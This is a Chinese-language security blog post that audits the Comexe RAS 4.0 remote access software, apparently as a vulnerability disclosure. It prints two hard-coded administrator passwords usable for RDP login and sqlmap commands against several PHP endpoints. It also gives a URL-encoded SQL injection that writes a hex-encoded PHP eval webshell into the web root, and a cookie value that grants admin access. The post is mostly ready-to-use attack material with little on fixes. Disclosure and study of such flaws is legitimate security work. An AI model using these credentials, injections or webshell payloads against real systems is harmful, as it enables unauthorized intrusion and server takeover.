2021年12月31日16:00:35评论238 views字数 1012阅读3分22秒阅读模式

应急时碰到的一套系统，简单记录下

0x01 硬编码问题

科迈RAS4.0在安装时会创建2个管理员账户RAS_admin、RASCOM，这两个账户硬编码了2组密码，

账户名	密码
RASCOM	1A2b3C4d56.
RAS_admin	R1a2b3c4d56.

这就导致如果机器开了RDP，那么可以通过这两组帐密直接登录

0x02 SQL注入问题

审计的时候发现这套源码通过COM组件形式调用的SQL语句，IDA里看到均为直接拼接，且代码中没有做过滤

Server/CmxCheckBind.php

python3 sqlmap.py -u "http://10.100.100.133:8088/Server/CmxCheckBind.php?a=1&b=2&c=3&d=4&from=5" --level 5 --risk 3

Server/CmxBindMachine.php

python3 sqlmap.py -u "http://10.100.100.133:8088/Server/CmxBindMachine.php?m=1&b=2&a=3&c=4" --risk 3 --level 5

Server/CmxUserMap_1.php

python3 sqlmap.py -u "http://10.100.100.133:8088/Server/CmxUserMap_1.php?a=a&b=b&c=c"

Server/CmxGetLoginType.php

http://10.100.100.133:8088/Server/CmxGetLoginType.php?a=admin%27%20LIMIT%200%2C1%20INTO%20OUTFILE%20%27C%3A%2FProgram%20Files%20%28x86%29%2FComexe%2FRasMini%2Frasweb%2FApache2%2Fhtdocs%2Fsmarty-2.6.19%2FServer%2Faa.php%27%20LINES%20TERMINATED%20BY/**/0x3C3F70687020406576616C28245F504F53545B2758275D293B3F3E--%20-

类似的地方还有很多，几乎与数据交互的地方均可注入

0x03 越权

Cookie中添加RAS_Admin_UserInfo_UserName=admin即可以admin登录

0x04 影响范围

BY:先知论坛

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

X迈RAS4.0审计分析 - Sp4ce

0x01 硬编码问题

0x02 SQL注入问题

Server/CmxCheckBind.php

Server/CmxBindMachine.php

Server/CmxUserMap_1.php

Server/CmxGetLoginType.php

0x03 越权

0x04 影响范围

一次小型 APT 持久潜伏内网域渗透（上） - saulGoodman

记一次因为无聊引发的逆向（Android逆向） - 冷水明天不熬夜了

一次简单的内网渗透靶场实战 - zanthoxylum

内核漏洞利用入门 Part 1 - PureT

强网杯 Notebook writeup -- 4种解法 - 320will

.net反序列化之Fastjson - Y4er

LEXSS: 绕过词法解析过程中的安全机制 - mss****

平平无奇的代码审计 - 爱吃猫的闲鱼

利用 Hook 技术打造通用的 Webshell - Jayl1n

Seacms代码审计小结 - err0ratao

发表评论

在线咨询

微信